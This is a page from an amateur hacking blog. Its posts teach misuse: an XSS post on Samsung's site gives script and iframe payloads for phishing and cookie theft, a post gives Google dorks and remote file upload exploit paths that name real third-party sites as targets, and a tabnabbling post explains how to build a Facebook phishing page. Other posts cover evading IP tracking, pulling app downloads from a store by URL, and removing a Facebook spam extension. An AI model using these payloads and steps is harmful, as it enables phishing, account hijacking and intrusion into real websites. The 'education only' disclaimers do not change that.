change what we need!

XSS Found in Official web site of Samsung

Posted in | at 11:12 PM

After a long time back in action with big boom.actually last 1 or 2 months i planed to post here something but unfortunately i have no topic for post here...:P
I am big fan of samsung galaxy s3 and i want it so as usually open Samsung's official web site and start to explore it.... bt we are Hacker i found something when i searched on web site and i forgot that why i am here and my devil.exe start ..lolzz
forgot all this thing it just "MASTI"
HERE WE GO...

WHAT IS XSS:



·         XSS is a type of computer security vulnerability typically found in Web applications, such as web browsers through breaches of browser security, that enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner.

TYPES OF XSS :
  • Persistent XSS (PERMANENT)
  • Reflective XSS (TEMPORARY)

Impact of Cross-Site Scripting

  • Hijack an account
  • Spread Web worms
  • Access browser history and clipboard contents
  • Control the browser remotely
  • Scan and exploit intranet appliances and applications

Detecting a XSS Attack

<SCRIPT>ALERT("UK")</SCRIPT>
use this script in search box if u get a pop alert box then it means there is an xss 

 xss Example :

mr.uk45 found an xss vulnerability in Samsung's official web site 
open this web site got to search box and type 
 <SCRIPT>ALERT("UK")</SCRIPT> and hit enter 

 

 

 

 

 

 

now how you can misuse it :P

make your own phishing page 

use this script in search box

<iframe src="your phishing link" width="1000px" height="1000px" />

 

 

 

 

 

 

you can steal cookie using 

<script>alert(document.cookie)</script>

use your social engineering skill and hack the planet :)  

have a safe hacking :D :P



  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • Twitter
  • RSS
Read Users' Comments (0)

BEST WAY TO HIDE IP

Posted in | at 1:51 AM

HY friends ..
new and trusted way to hide your ip
Trust me ..after reading this you must say that we dont need to pay anything for surf anonymous
Here we goo,,,,,,
just go to anonymizer.com
and download or buy anonymizer universal
you have to pay only $79.99 for it
finish now you can surf anonymously...lolzz
i am just kiding..we are hacker we never pay

now its time to start our devil mind's devil exe.....
step 1)
just replace .com to .ru
click here




the site convert in russian version...

step 2)
Now in top of site you find the box  just type site what you want to access..!

here i am typing www.google.com






why we use russian web site?
ans:-
Most of the russian web sites are free so no need to pay anything
More important thing is most of the russian web site create by computer criminal bcz there is no IT act
so only one criminal can understand the other criminal's need! :P

AND MORE INTRESTING THINGS IS THEY HIDE THEIR LOGS ...
SO TRUST ME THERE IS NO WAY TO TRACK YOU BY UR IP ADDRESS ...ENJOY HACKING
note:: i recommended that use https:// when u browesing facebook or anyother social site!!










  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • Twitter
  • RSS
Read Users' Comments (0)

How to remove Facebook viruse(spamm) posting nude video link on your friends wall

Posted in | at 10:20 PM


ohhh god..last 25 daysssssss..!!
When my friends call me i got smile on my face bczz i think they all care me..
bt actually they want to know that how to remove this facebook viruse...hahah :)
and they want my help.

So finally i decide to find that how to stop this viruse.
After a googling.i was found some usefull tricks and tips
and finally decide to post that info. on your favourite place i mean my blog..;)
Lets start ..

There is viruse on facebook with a partially nude picture, 
Which gets posted in your name to all your friends if you click on it.
Obviously it spreads once you click on it, so avoid clicking on it at the first place.


 





If your are smart and you already click on it ...(it means your are intrested to watch this nude celebrity
me also yaarr dont be shy..:P)THEN DONT WRRY
its joke part forgot it
here is the step to remove your favourity video ..

So the solution to remove this facebook virus is to remove / uninstall the extension. Extension is named YouTube Premium.
for remove this extensions:
Google Chrome:

Goto Tools > Extensions and remove the extension youtube premium from there

Mozilla Firefox:
Goto Tools > Addons > Extensions and remove the addon “youtube premium”

Hopefully this will resolve the issue of facebook virus posting nude video link on your friends walls from your name!
and yes next time think twice before clicking on such links.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • Twitter
  • RSS
Read Users' Comments (0)

how to hack web sites with Rte Remote file upload

Posted in | at 11:15 AM

Hi Guyz after long break come back 2 the work
here is one of the easiest method to hack web site
In this Tutorial i will tell you how to hack web sites with Rte Remote file upload Vulnerability

» 1. use these google dorks :

inurl:rte/my_documents/my_files
inurl:/my_documents/my_files/

The Exploit is

site.com/rte/RTE_popup_file_atch.asp

site.com/admin/RTE_popup_file_atch.asp

For Example :
1)Site:- http://www.billkonigsberg.com
Vulnerability http://www.billkonigsberg.com/RTE_popup_file_atch.asp


2}Site:- http://www.jrf.org.tw
Vulnerability:http://www.jrf.org.tw/newjrf/rte/RTE_popup_file_atch.asp
enjoy hacking ...
note:this information is only for education purpose only..dont miss-useee

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • Twitter
  • RSS
Read Users' Comments (0)

Download Application from store.ovi.com in your pc

Posted in | at 12:00 AM

hello friends ....i am come back with new more intresting trick...you can called it one type of hacking.
now you able to download application from store.ovi.com in your pc ..no need to send to cell and then download ...


wat we need ...for done our job..!!

notepad++..click on it and download it!

start to bypass ovi...!!

Step(1)
goto store.ovi.com

And login in your account

Step(2)

Open the application …which you want to download

Step(3)

Copy the path of this application

And paste it on urlbar

just look like this...

Store.ovi.com/content/112595

After the number add../download

And hit the enter button

After this you get pop-up for download ….the file

Extention of this file is .jad(Java Application Descriptor)

step(4)

Download this file and open with notepad++

And Find this text:MIDlet-Jar-URL:’, you will get something like this on the line:
https://d.ovi.com/p/g/store/3723888/ASBR_SMS_5233_EN_134_226006.jar?q=6FEDHgj3mstx0PDZvvjtYbzqIry9EKS*&c=ovi_store&eid=7c8557ff-1953-4a2a-91de-9190917870b6&productid=610099&sid=OviStore

Copy the URL to the URL bar on your browser, I mean this one:
https://d.ovi.com/p/g/store/3723888/ASBR_SMS_5233_EN_134_226006.jar?q=6FEDHgj3mstx0PDZvvjtYbzqIry9EKS*&c=ovi_store&eid=7c8557ff-1953-4a2a-91de-9190917870b6&productid=610099&sid=OviStore
Press Enter, you will get the *.jar file, and you can download the *.jad file



step(5)

Symbian Installation Files (*.sis.dm or *.sisx.dm)
Remove the 3 lines text, it will be something like this:
–boundary-1
Content-Type: x-epoc/x-sisx-app
Content-Transfer-Encoding: binary

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • Twitter
  • RSS
Read Users' Comments (0)

Tabnabbling

Posted in | at 4:51 AM

Hello friendss i am coming with new and more intresting method call "TABNABBLING"
Its a new version of "PHISHING"....
I will use "tabnabbling" brought out by Aza Raskin.
If you are new to it you can follow my earlier post on tabnabbling.keep in mind that you know what is "phishing" and how it is done,so lets start....!!

Requirements:
(1) you should know how phishing is carried out if not (read here)
(2)you should have free hosting account(t35.com,110mb.com)
(3)Need two codes of java script on Tabnabbling (download here)

Start Tabnabbling:
facebook is one of the most used social networking site so..we make phishing page of facebook

step 1>make one phishing(fake) page of facebook(if u dont know how make it read here)

step2>Now use standard web page like "www.gooogle.com" save the source code of it in a
text file
save this page like"google.html"....

step3>download the code and open "Bgaatack.js injecting Code.txt" and copy the content.

step4>Now open the step2 file(google.com) and find (alt + f) first
and put the copied content above it then save
and upload the page on free web hosting


step5>now open "bgattack.js" and find (alt + f) "window.location=''" as
shown in below and replace with ur fake page then save and upload it


step6>Click on standard webpage and open few tabs and see the change.
Now the process is complete..:)

i have made Demo you can check it here.
and open more 2 or 3 tab back on main page ........whatsssssss happening!

Note:
this information is only for education propose
so i request u guyz plz dont miss use of this
method



  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • Twitter
  • RSS
Read Users' Comments (0)
Posted in | at 10:07 PM

HOW TO HACK FACEBOOK PROFILE LAYOUT
Hey friends last night i found some awsome trick to hack facebook profile look(Layout)..
its very funny....and easy..!
now I am going to Hack facebook profile.....
step1>

  • first u need your jakkkash (good ,handsome/beautiful) image
step2>

  • open http://www.piccut.com/ site click here

step3>
  • now click on browse choose your photo(jakksah)...mind IT

...after the choose image click on upload profile picture
step4>
  • after a mint the site automatically display the demo of your image.. how look it when you upload on your facebook profile
step5>
  • download the ZIP file...extract file

step6>
  • now open your facebook acc.
  • make one album
  • upload your all images
  • view snapshot and ..find the image which name is profile-pic.jpg in your photos
upload as your profile pic.

step7>
  • now open your album tag(tag yourself only) first image5.jpg
than image4.jpg cont....
step8>
  • after this process refresh your facebook profile check out how its lookkkk....



if you like my post than follow me....

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • Twitter
  • RSS
Read Users' Comments (1)comments
Subscribe to: Posts (Atom)